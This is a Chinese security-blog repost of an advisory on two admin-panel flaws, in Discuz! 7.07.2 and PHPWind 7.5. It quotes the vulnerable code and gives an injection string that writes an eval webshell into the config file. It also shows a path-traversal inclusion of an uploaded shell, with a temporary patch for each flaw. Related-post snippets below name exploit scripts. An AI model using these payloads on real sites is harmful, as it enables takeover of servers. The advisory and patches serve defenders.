php 7.07,Discuz!7.07.2 & Phpwind7.5 后台鸡肋漏洞漏洞预警 -电脑资料

最新推荐文章于 2024-08-27 17:47:46 发布
最新推荐文章于 2024-08-27 17:47:46 发布
阅读量288 收藏
点赞数
文章标签: php 7.07
本文详细介绍了Discuz后台设置中的代码注入漏洞,通过污染配置文件实现shell写入,并提供了漏洞测试步骤和临时补丁。同时,也揭示了PHPWind后台的本地包含漏洞,允许通过特定方式触发本地文件包含,可利用tmp目录下的文件进行攻击。针对这两个漏洞,文章给出了相应的缓解方案。
摘要由CSDN通过智能技术生成

转自t00ls

很多人有了,流传出来了,然后发出来,

一、discuz后台settings.inc.php中写shell漏洞:

漏洞详情:

if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {

$ucdbpassnew = $settingsnew['uc']['dbpass'] == '********' ? UC_DBPW : $settingsnew['uc']['dbpass'];

if($settingsnew['uc']['connect']) {

$uc_dblink = @mysql_connect($settingsnew['uc']['dbhost'], $settingsnew['uc']['dbuser'], $ucdbpassnew, 1);

if(!$uc_dblink) {

cpmsg('uc_database_connect_error', '', 'error');

} else {

mysql_close($uc_dblink);

}

}

$fp = fopen('./config.inc.php', 'r');

$configfile = fread($fp, filesize('./config.inc.php'));

$configfile = trim($configfile);

$configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;

fclose($fp);

$connect = '';

if($settingsnew['uc']['connect']) {

require './config.inc.php';

$connect = 'mysql';

$samelink = ($dbhost == $settingsnew['uc']['dbhost'] && $dbuser == $settingsnew['uc']['dbuser'] && $dbpw == $ucdbpassnew);

$samecharset = !($dbcharset == 'gbk' && UC_DBCHARSET == 'latin1' || $dbcharset == 'latin1' && UC_DBCHARSET == 'gbk');

$configfile = insertconfig($configfile, "/define\('UC_DBHOST',\s*'.*?'\);/i", "define('UC_DBHOST', '".$settingsnew['uc']['dbhost']."');");//正则表示从'到')中的被替换,而')可以被任意提交,from oldjun.com

$configfile = insertconfig($configfile, "/define\('UC_DBUSER',\s*'.*?'\);/i", "define('UC_DBUSER', '".$settingsnew['uc']['dbuser']."');");

$configfile = insertconfig($configfile, "/define\('UC_DBPW',\s*'.*?'\);/i", "define('UC_DBPW', '".$ucdbpassnew."');");

$configfile = insertconfig($configfile, "/define\('UC_DBNAME',\s*'.*?'\);/i", "define('UC_DBNAME', '".$settingsnew['uc']['dbname']."');");

$configfile = insertconfig($configfile, "/define\('UC_DBTABLEPRE',\s*'.*?'\);/i", "define('UC_DBTABLEPRE', '`".$settingsnew['uc']['dbname'].'`.'.$settingsnew['uc']['dbtablepre']."');");

//$configfile = insertconfig($configfile, "/define\('UC_LINK',\s*'?.*?'?\);/i", "define('UC_LINK', ".($samelink && $samecharset ? 'TRUE' : 'FALSE').");");

}

$configfile = insertconfig($configfile, "/define\('UC_CONNECT',\s*'.*?'\);/i", "define('UC_CONNECT', '$connect');");

$configfile = insertconfig($configfile, "/define\('UC_KEY',\s*'.*?'\);/i", "define('UC_KEY', '".$settingsnew['uc']['key']."');");

$configfile = insertconfig($configfile, "/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '".$settingsnew['uc']['api']."');");

$configfile = insertconfig($configfile, "/define\('UC_IP',\s*'.*?'\);/i", "define('UC_IP', '".$settingsnew['uc']['ip']."');");

$configfile = insertconfig($configfile, "/define\('UC_APPID',\s*'?.*?'?\);/i", "define('UC_APPID', '".$settingsnew['uc']['appid']."');");

$fp = fopen('./config.inc.php', 'w');

if(!($fp = @fopen('./config.inc.php', 'w'))) {

cpmsg('uc_config_write_error', '', 'error');

}

@fwrite($fp, trim($configfile));

@fclose($fp);

}

settings.inc.php对提交的数据缺乏有效过滤,导致可以写入')污染配置文件的数据,而insertconfig函数的正则匹配无法正确匹配到最后,导致可以经过2次输入可以成功绕过daddslashes把shell写进配置文件,Discuz!7.07.2 & Phpwind7.5 后台鸡肋漏洞漏洞预警》(https://www.unjs.com)。

function insertconfig($s, $find, $replace) {

if(preg_match($find, $s)) {

$s = preg_replace($find, $replace, $s);//正则匹配替换数据

} else {

$s .= "\r\n".$replace;

}

return $s;

}

漏洞测试:

步骤一:UC_IP(UC_IP是可选项,随便写入一般不影响程序运行)中写入污染数据:xxx');eval($_POST[cmd])?>提交;

步骤二:UC_IP随便输入aaa,正则匹配只匹配到了'),于是自动把分号前的闭合了。

临时补丁:

在if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {下添加:

foreach($settingsnew['uc'] as $key => $value){

$settingsnew['uc'][$key]=str_replace(')','',$value);

}

二、phpwind后台本地包含漏洞:

漏洞详情:

文件:hack\rate\admin.php

源码:

!function_exists('readover') && exit('Forbidden');

define ( "H_R", R_P . "hack/rate/" );

define ( "L_R", R_P . "lib/" );

InitGP ( array ('ajax' ) );

$action = strtolower ( ($job) ? $job : "admin" );

$filepath = H_R . "action/" . $action . "Action.php";

(! file_exists ( $filepath )) && exit ();

if ($job != "ajax") {

require H_R . '/template/layout.php';

} else {

require_once $filepath;

}

?>

再看看hack\rate\template\layout.php:

!function_exists('readover') && exit('Forbidden');

include_once PrintEot ( 'left' );

print <

EOT;

require_once $filepath;

include_once PrintEot ( 'adminbottom' );

?>

$job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///截断,或者直接在tmp文件夹下写个shell来包含。具体不多说了,利用办法:

漏洞测试:

先在tmp下上传一个shell,名为Action.php

然后访问:http://127.0.0.1/pw/admin.php?ad ... ../../../../../tmp/

临时补丁:

$filepath = H_R . "action/" . $action . "Action.php";

替换为:

$filepath = Pcv(H_R . "action/" . $action . "Action.php");

呆呆wang
关注
phpwind漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 931
phpwind漏洞利用,考虑到PHPWind是国内著名的论坛程序,利用它建站的网站非常多,我顿时来了兴趣,决定看看这个漏洞怎么利用。 看漏洞的名字好像影PHPWind8.0版本,我机子里保存了以前下载的PHPWind v8.0 GBK build 20100810的源程序,在虚拟机里安装后测试漏洞不能利用,换了PHPWindForums v7.5 SP3 GBK整合版漏洞利用成功,可能是我机子中之前的版本比较新的缘故吧。下面就用PHPWind Forums v7.5 SP3 GBK整合版来给大家介绍phpw
PHPWind v7.5 / v8.0漏洞EXP
收集盒 Book box
08-29 2967
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5 影响版本:PHPWind v7.5 / v8.0 命令 :php pking.php user passhttp://www.xxxx.com/ pking.php:复制内容到剪贴板程序代码
phpwind GET型CSRF任意代码执行
最新发布
qq_63034068的博客
08-27 695
回调函数 call_user_func_array()spl_autoload 、 spl_autoload_register 、 __autoload 三个函数利用数组+命名空间加载相同名字的类利用StdClass代替对象数组将CSRF和反序列化结合,从而使只能在后台触发的序列化漏洞,变为前台getshell。降低漏洞利用条件。CSRF利用技巧。
php留言本漏洞 后台,Phpwind7.5 后台本地包含漏洞
weixin_39836943的博客
03-25 252
文件:hack\rate\admin.php源码:<?php!function_exists('readover') && exit('Forbidden');define ( "H_R", R_P . "hack/rate/" );define ( "L_R", R_P . "lib/" );InitGP ( array ('ajax' ) );$action = strt...
phpwindexp.php,PHPWind v7.5 / v8.0漏洞EXP
weixin_30703633的博客
03-22 493
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5影响版本:PHPWind v7.5 / v8.0命令 :php pking.php user passhttp://www.xxxx.com/pking.php:复制内容到剪贴板程序代码
phpwindexp.php,phpwind 7.5 0day漏洞利用 (EXP发布)
weixin_39912163的博客
03-22 851
phpwind 7.5 Multiple Include Vulnerabilities一.api/class_base.php本地包含漏洞1.描叙api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base.php文件里:function callback($mode, $met...
帝国CMS7.0 7.2 7.5微信登录插件 UTF-8版本.zip
11-13
帝国CMS微信登录插件是一款专为帝国CMS内容管理系统设计的扩展功能,支持7.0、7.2和7.5这三个版本,适用于UTF-8编码环境。该插件旨在简化用户的登录流程,允许用户通过微信账号直接登录网站,提高用户体验并增加用户...
参考资料-4.3.7.07 电线导管、电缆导管和线槽敷设检验批质量验收表(室内金属).zip
02-28
2. **电缆导管**:电缆导管与电线导管类似,但通常用于承载多芯电缆,确保电缆的固定和保护。验收时需确认导管内径是否满足电缆安装需求,电缆的弯曲半径是否合规,防止电缆受压损伤。 3. **线槽敷设**:线槽是一种...
php-7.0.27.tar.gz
07-30
编译 ./configure --prefix=/usr/local/php --exec-prefix=/usr/local/php --bindir=/usr/local/php/bin --sbindir=/usr/local/php/sbin --includedir=/usr/local/php/include --libdir=/usr/local/php/lib/php --...
支持7.07.27.5UTF-8微信登入插件一键登入简单便捷傻瓜式设置.txt
03-05
### 支持7.07.27.5UTF-8微信登录插件一键登录简单便捷傻瓜式设置 在当今互联网技术飞速发展的时代,各种应用和服务不断涌现,为用户提供了极大的便利。其中,社交媒体平台如微信已经成为人们日常生活中不可或缺的一...
C语言:编写函数fun其功能是:根据整型形参m,计算如下公式的值:y=1/2!+1/4!+...+1/m!(m是偶数)
10-29 8778
#include "stdio.h" void TestFunc(); double fun(int m) { /**********Begin**********/ double y=0.0; int i,j; double s=1; for (i=2;i<=m;i+=2) {for(j=i-1;j<=i;j++) s=s*j; y=y+1.0/s; }return y; /********** End **********/ } void main() { in
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
Phpwind出现严重安全漏洞
好好学习,天天向上
01-10 994
近日,国内知名的社区PHPWIND又现严重漏洞,程序中有部分变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令,官方针对这个漏洞已经做出了修补。 phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/cla
PHPWind7.5多个文件包含漏洞的exploit
lvming404的专栏
02-23 2025
尝试发送以下URL,能实现本地文件包含渗透。http://10.20.61.88/phpWind7.5/pw_api.php?type=uc&sig=8c6e45dcfae660037c05f0cd1a15695b&mode=../../../../../../../../test.txt%00http://10.20.61.88/phpWind7.5/pw_api.php?type=uc
phpwindexp.php,PHPWind v7.5 / v8.0漏洞EXP
weixin_42524499的博客
03-22 313
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5影响版本:PHPWind v7.5 / v8.0命令 :php pking.php user passhttp://www.xxxx.com/pking.php:复制内容到剪贴板程序代码echo "Info: Poc for Phpwind远程命令执行Test: exploit.php user password[/...
phpwind漏洞与修复方
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 523
phpwind漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。 phpwind9.0一拖再拖终于发布了,看起来很NB的样子,但是其实是谁用谁知道 ,各种bug满天飞,各种报错…这个就是一例,通杀型…,官方不修复,我自己用着新版本蛋疼啊.. 签到的时候,在自定义我想说的地方,写几个引号,然后就杯具了..提交后,直接报出绝对路径..
phpwind index.php?m=design&c=api,phpwind v9存在命令执行漏洞(登陆后台
weixin_30249953的博客
03-13 544
已知漏洞:https://www.seebug.org/vuldb/ssvid-94465phpwind v9最新版存在命令执行漏洞(登陆后台)Phpwind_v9.0.2(最新版),phpwind_v9.0.1命令执行高危(getshell)phpwind是一个基于PHP和MySQL的开源社区程序,是国内最受欢迎的通用型论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活...
漏洞复现:phpwind v 9.0.2后台getshell
qq_41631806的博客
04-05 3396
漏洞复现:phpwind v 9.0.2后台getshell 已知影响版本:v9.0.1,v9.0.2 复现版本:9.0.2 搭建环境:phpstudy2018 步骤: 1.将源码放置网站根目录(C:\phpStudy\PHPTutorial\WWW)。如下操作,刷新首页,或修改删除目录下.htaccess文件可解决首页访问限制情况: 2.打开install.php页面安装好phpwind后登陆后...
PHP又有重大漏洞,PHPWind重大漏洞 大量论坛被夺管理权
weixin_34135138的博客
04-02 501
4月6日傍晚,PHPWind论坛系统漏洞在互联网上爆发,一时间,众多站点开始提供此系统漏洞的恶意攻击工具,大量站点被恶性入侵并删除数据,后台管理员密码无法登陆。大旗、BTCHINA等站点进行关闭修复,而有站点则被删除十万以上数据。今天官方网站论坛又遭到了DDOS攻击。据PHPWind官方表示,PHPWind作为国内被广泛应用的BBS系统程序,在国内互联网中,几乎约占1/3的站点在同时使用该程序,显...
FlexPDE 7.07:二维三维偏微分方程数值解工具
资源摘要信息:"PDE_Solutions_FlexPDE_7.07.rar" FlexPDE是一个专业的数值分析和模拟软件,用于求解偏微分方程(Partial Differential Equations, PDEs)。它在工程、物理、生物学以及其他需要对连续介质建模的领域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值